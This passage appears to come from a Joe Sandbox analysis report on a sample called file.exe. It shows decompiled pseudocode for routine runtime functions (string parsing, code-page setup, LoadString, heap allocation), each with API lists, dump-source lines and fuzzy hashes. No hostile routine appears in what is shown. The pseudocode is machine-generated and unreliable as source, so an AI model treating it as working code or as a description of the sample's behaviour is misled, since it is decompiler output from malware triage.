					 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + _t79;
					if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x3d) {
						goto L26;
					} else {
						 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
						if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x22) {
							goto L26;
						} else {
							 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
							 *((intOrPtr*)(_t138 - 0x2c)) = 0;
							 *((intOrPtr*)(_t138 - 0x28)) = 0;
							 *((intOrPtr*)(_t138 - 0x24)) = 0;
							E0040243E(_t138 - 0x2c, 3);
							 *(_t138 - 4) = 3;
							while( *((intOrPtr*)(_t138 - 0x10)) <  *((intOrPtr*)(_t136 + 4))) {
								_t90 =  *_t136;
								_t116 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
								 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
								 *((char*)(_t138 - 0x1c)) = _t116;
								if(_t116 == 0x22) {
									_t91 = E0040411F(_t138 - 0x2c, _t138 - 0x44, __eflags);
									__eflags = _t91;
									if(_t91 == 0) {
										break;
									}
									_push(_t138 - 0x50);
									E004040BE( *((intOrPtr*)(_t138 - 0x20)), 0);
									E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
									E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
									 *(_t138 - 4) =  *(_t138 - 4) | 0xffffffff;
									E0040213F(_t138 - 0x50);
									goto L1;
								}
								if(_t116 != 0x5c) {
									_push( *((intOrPtr*)(_t138 - 0x1c)));
								} else {
									_t98 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
									 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
									 *((char*)(_t138 - 0x18)) = _t98;
									if(_t98 == 0x22) {
										_push(0x22);
									} else {
										if(_t98 == 0x5c) {
											_push(0x5c);
										} else {
											if(_t98 == 0x6e) {
												_push(0xa);
											} else {
												if(_t98 == 0x74) {
													_push(9);
												} else {
													E00401EE5(_t138 - 0x2c, 0x5c);
													_push( *((intOrPtr*)(_t138 - 0x18)));
												}
											}
										}
									}
								}
								E00401EE5(_t138 - 0x2c);
							}
							E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
							goto L28;
						}
					}
				}
				_t70 = 1;
				goto L29;
			}













                              0x00403d5f
                              0x00403d68
                              0x00403d6d
                              0x00403d70
                              0x00403d77
                              0x00403d7a
                              0x00403d7a
                              0x00403d7f
                              0x00403d84
                              0x00403d86
                              0x00000000
                              0x00000000
                              0x00403d8f
                              0x00403d97
                              0x00403d9a
                              0x00403da1
                              0x00403da8
                              0x00403db5
                              0x00403dc0
                              0x00403dcb
                              0x00403eec
                              0x00403eef
                              0x00403ef7
                              0x00403eff
                              0x00403f2c
                              0x00403f2c
                              0x00403f2c
                              0x00403f2e
                              0x00403f33
                              0x00403f3b
                              0x00403f3b
                              0x00403dd1
                              0x00403dd1
                              0x00403dd6
                              0x00000000
                              0x00000000
                              0x00403ddc
                              0x00403deb
                              0x00000000
                              0x00403e00
                              0x00403e00
                              0x00403e0f
                              0x00000000
                              0x00403e24
                              0x00403e24
                              0x00403e2c
                              0x00403e2f
                              0x00403e32
                              0x00403e35
                              0x00403e3a
                              0x00403e3e
                              0x00403e4a
                              0x00403e4f
                              0x00403e52
                              0x00403e58
                              0x00403e5b
                              0x00403eb0
                              0x00403eb5
                              0x00403eb7
                              0x00000000
                              0x00000000
                              0x00403ebf
                              0x00403ec0
                              0x00403ec8
                              0x00403ed0
                              0x00403ed5
                              0x00403ede
                              0x00000000
                              0x00403ede
                              0x00403e60
                              0x00403ea5
                              0x00403e62
                              0x00403e65
                              0x00403e68
                              0x00403e6d
                              0x00403e70
                              0x00403e99
                              0x00403e72
                              0x00403e74
                              0x00403e95
                              0x00403e76
                              0x00403e78
                              0x00403e91
                              0x00403e7a
                              0x00403e7c
                              0x00403e8d
                              0x00403e7e
                              0x00403e83
                              0x00403e88
                              0x00403e88
                              0x00403e7c
                              0x00403e78
                              0x00403e74
                              0x00403e70
                              0x00403e9e
                              0x00403e9e
                              0x00403f0c
                              0x00403f14
                              0x00403f1c
                              0x00403f24
                              0x00000000
                              0x00403f29
                              0x00403e0f
                              0x00403deb
                              0x00403ee8
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00403D5F
                                • Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: > @$KA
                              • API String ID: 3519838083-301980584
                              • Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
                              • Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041808D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E0041808D(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x4256c8,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00418A6C(1,  &_v280, 0x100,  &_v1304,  *0x4256c8,  *0x4258e4, 0);
						E0041881D( *0x4258e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4256c8, 0);
						E0041881D( *0x4258e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4256c8, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x4256e0) =  *(_t55 + 0x4256e0) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x4256e0) = _t77;
								goto L16;
							}
							 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x4256e0) =  *(_t43 + 0x4256e0) & 0x00000000;
						} else {
							 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x4256e0) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                              0x004180aa
                              0x004180b0
                              0x004180b7
                              0x004180b7
                              0x004180be
                              0x004180bf
                              0x004180c3
                              0x004180c6
                              0x004180cf
                              0x00418108
                              0x00418127
                              0x0041814b
                              0x00418173
                              0x0041817b
                              0x0041817d
                              0x00418183
                              0x00418183
                              0x00418189
                              0x004181a4
                              0x004181b6
                              0x00000000
                              0x004181b6
                              0x004181a6
                              0x004181ad
                              0x00418199
                              0x00418199
                              0x00000000
                              0x00418199
                              0x0041818b
                              0x00418192
                              0x00000000
                              0x004181bd
                              0x004181bd
                              0x004181bf
                              0x004181c0
                              0x00000000
                              0x00418183
                              0x004180d3
                              0x004180d6
                              0x004180d6
                              0x004180d9
                              0x004180de
                              0x004180e2
                              0x004180e9
                              0x004180f1
                              0x004180fb
                              0x004180fb
                              0x004180fb
                              0x004180fe
                              0x004180ff
                              0x00418102
                              0x00000000
                              0x00418107
                              0x004181c6
                              0x004181cd
                              0x004181d0
                              0x004181ee
                              0x00418203
                              0x004181f5
                              0x004181f5
                              0x004181fe
                              0x00000000
                              0x004181fe
                              0x004181d7
                              0x004181d7
                              0x004181e0
                              0x004181e3
                              0x004181e3
                              0x004181e3
                              0x0041820a
                              0x0041820b
                              0x00418211

                              APIs
                              • GetCPInfo.KERNEL32(?,00000000), ref: 004180A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Info
                              • String ID: $
                              • API String ID: 1807457897-3032137957
                              • Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
                              • Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405F5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E00405F5E(intOrPtr __ecx, struct HINSTANCE__* __edx, void* __esi) {
				signed int _t38;
				WCHAR* _t54;
				WCHAR* _t58;
				int _t61;
				void* _t63;
				intOrPtr _t68;

				E00413954(E00419764, _t63);
				_t68 =  *0x423148; // 0x1
				 *(_t63 - 0x14) = __edx;
				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t63 - 0x18)) = 0;
				if(_t68 == 0) {
					_push( *(_t63 + 8));
					E00405EBC(_t63 - 0x30, __edx);
					 *((intOrPtr*)(_t63 - 4)) = 1;
					E00401A03();
					_push( *((intOrPtr*)(_t63 - 0x30)));
				} else {
					 *(_t63 - 0x24) = 0;
					 *(_t63 - 0x20) = 0;
					 *((intOrPtr*)(_t63 - 0x1c)) = 0;
					E00402170(_t63 - 0x24, 3);
					 *((intOrPtr*)(_t63 - 4)) = 0;
					_t61 = 0x100;
					do {
						_t61 = _t61 + 0x100;
						_t9 = _t61 - 1; // -1
						_t36 = _t9;
						if(_t9 >=  *((intOrPtr*)(_t63 - 0x1c))) {
							E00402170(_t63 - 0x24, _t36);
						}
						_t14 = _t63 - 0x14; // 0x414be4
					} while (_t61 - LoadStringW( *_t14,  *(_t63 + 8),  *(_t63 - 0x24), _t61) <= 1);
					_t54 =  *(_t63 - 0x24);
					_t38 = 0;
					if( *_t54 != 0) {
						_t58 = _t54;
						do {
							_t38 = _t38 + 1;
							_t58 =  &(_t58[1]);
						} while ( *_t58 != 0);
					}
					_t54[_t38] = 0;
					 *(_t63 - 0x20) = _t38;
					E00401CE1( *((intOrPtr*)(_t63 - 0x10)), _t63 - 0x24);
					_push( *(_t63 - 0x24));
				}
				E00403A9C();
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return  *((intOrPtr*)(_t63 - 0x10));
			}









                              0x00405f63
                              0x00405f6e
                              0x00405f74
                              0x00405f77
                              0x00405f7a
                              0x00405f7d
                              0x00405ff8
                              0x00405ffe
                              0x00406008
                              0x0040600f
                              0x00406014
                              0x00405f7f
                              0x00405f85
                              0x00405f88
                              0x00405f8b
                              0x00405f8e
                              0x00405f93
                              0x00405f96
                              0x00405f9b
                              0x00405f9b
                              0x00405fa1
                              0x00405fa1
                              0x00405fa7
                              0x00405fad
                              0x00405fad
                              0x00405fb9
                              0x00405fc6
                              0x00405fcb
                              0x00405fce
                              0x00405fd4
                              0x00405fd6
                              0x00405fd8
                              0x00405fd8
                              0x00405fda
                              0x00405fdb
                              0x00405fd8
                              0x00405fe0
                              0x00405fe7
                              0x00405fee
                              0x00405ff3
                              0x00405ff3
                              0x00406017
                              0x00406024
                              0x0040602c

                              APIs
                              • __EH_prolog.LIBCMT ref: 00405F63
                              • LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
                              • Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
                              • Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004172C2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E004172C2() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x425a08; // 0x1
				if(_t46 == 0) {
					E00418212();
				}
				GetModuleFileNameA(0, 0x423404, 0x104);
				_t14 =  *0x425a3c; // 0x663330
				 *0x4233f0 = 0x423404;
				_t37 = 0x423404;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E0041735B(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = E00413E65(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E00414C0C(8);
				}
				E0041735B(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x4233d8 = _t41;
				 *0x4233d4 = _t27;
				return _t27;
			}










                              0x004172c6
                              0x004172ca
                              0x004172d2
                              0x004172d4
                              0x004172d4
                              0x004172e5
                              0x004172eb
                              0x004172f0
                              0x004172f6
                              0x004172fa
                              0x004172fc
                              0x004172fc
                              0x00417309
                              0x0041731d
                              0x00417324
                              0x00417328
                              0x0041732d
                              0x0041733f
                              0x0041734a
                              0x0041734b
                              0x00417353
                              0x0041735a

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104,?,00000000,?,?,?,?,00414BA4), ref: 004172E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileModuleName
                              • String ID: 03f$C:\Users\user\Desktop\file.exe
                              • API String ID: 514040917-2073417093
                              • Opcode ID: da645aaeb4fe0cb827f73b94b10be33a860507997ce6edd88055b17a3d2933b4
                              • Instruction ID: 46598633bdd95e9c50c0f81cb0321b0ef1a06bc6faf2064ab6da3c70d88e46ff
                              • Opcode Fuzzy Hash: da645aaeb4fe0cb827f73b94b10be33a860507997ce6edd88055b17a3d2933b4
                              • Instruction Fuzzy Hash: 601142B6A00118BFD721DF98DC81CDBB7BCEB45758B5000ABF905D7201DA745F419BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00405EBC(intOrPtr __ecx, struct HINSTANCE__* __edx) {
				intOrPtr _t29;
				CHAR* _t43;
				int _t49;
				void* _t51;

				E00413954(E00419748, _t51);
				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
				 *(_t51 - 0x14) = __edx;
				 *((intOrPtr*)(_t51 - 0x18)) = 0;
				 *(_t51 - 0x24) = 0;
				 *((intOrPtr*)(_t51 - 0x20)) = 0;
				 *((intOrPtr*)(_t51 - 0x1c)) = 0;
				E0040243E(_t51 - 0x24, 3);
				 *((intOrPtr*)(_t51 - 4)) = 0;
				_t49 = 0x100;
				do {
					_t49 = _t49 + 0x100;
					_t9 = _t49 - 1; // -1
					_t27 = _t9;
					if(_t9 >=  *((intOrPtr*)(_t51 - 0x1c))) {
						E0040243E(_t51 - 0x24, _t27);
					}
					_t14 = _t51 - 0x14; // 0x414be4
				} while (_t49 - LoadStringA( *_t14,  *(_t51 + 8),  *(_t51 - 0x24), _t49) <= 1);
				_t43 =  *(_t51 - 0x24);
				_t29 = 0;
				if( *_t43 != 0) {
					do {
						_t29 = _t29 + 1;
					} while ( *((intOrPtr*)(_t29 + _t43)) != 0);
				}
				 *((char*)(_t29 + _t43)) = 0;
				 *((intOrPtr*)(_t51 - 0x20)) = _t29;
				E00403D24( *((intOrPtr*)(_t51 - 0x10)), _t51 - 0x24);
				E00403A9C( *(_t51 - 0x24));
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return  *((intOrPtr*)(_t51 - 0x10));
			}







                              0x00405ec1
                              0x00405eca
                              0x00405ed0
                              0x00405ed8
                              0x00405edb
                              0x00405ede
                              0x00405ee1
                              0x00405ee4
                              0x00405ee9
                              0x00405eec
                              0x00405ef1
                              0x00405ef1
                              0x00405ef7
                              0x00405ef7
                              0x00405efd
                              0x00405f03
                              0x00405f03
                              0x00405f0f
                              0x00405f1c
                              0x00405f21
                              0x00405f24
                              0x00405f28
                              0x00405f2a
                              0x00405f2a
                              0x00405f2b
                              0x00405f2a
                              0x00405f30
                              0x00405f36
                              0x00405f3d
                              0x00405f45
                              0x00405f53
                              0x00405f5b

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
                              • Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
                              • Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004160FA Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004160FA() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x425a28; // 0x0
				_t26 =  *0x425a18; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x425a2c; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x425a34, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x425a28 =  *0x425a28 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x425a34, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x425a34, 0,  *0x425a2c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x425a18 =  *0x425a18 + 0x10;
				 *0x425a2c = _t25;
				_t15 =  *0x425a28; // 0x0
				goto L3;
			}










                              0x004160fa
                              0x004160ff
                              0x0041610b
                              0x0041613d
                              0x0041613d
                              0x00416153
                              0x00416156
                              0x0041615e
                              0x00416161
                              0x0041618d
                              0x00000000
                              0x0041618d
                              0x00416170
                              0x00416178
                              0x0041617b
                              0x00416191
                              0x00416195
                              0x00416197
                              0x0041619a
                              0x004161a3
                              0x00000000
                              0x004161a6
                              0x00416187
                              0x00000000
                              0x00416187
                              0x0041610d
                              0x00416122
                              0x0041612a
                              0x00000000
                              0x00000000
                              0x0041612c
                              0x00416133
                              0x00416138
                              0x00000000

                              APIs
                              • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
                              • HeapFree.KERNEL32(00000000,?), ref: 00416187
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AllocHeap$FreeVirtual
                              • String ID:
                              • API String ID: 3499195154-0
                              • Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
                              • Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004156E1 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004156E1(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x42078c);
				InitializeCriticalSection( *0x42077c);
				InitializeCriticalSection( *0x42076c);
				InitializeCriticalSection( *0x42074c);
				return _t1;
			}




                              0x004156e1
                              0x004156ee
                              0x004156f6
                              0x004156fe
                              0x00415706
                              0x00415709

                              APIs
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalInitializeSection
                              • String ID:
                              • API String ID: 32694325-0
                              • Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
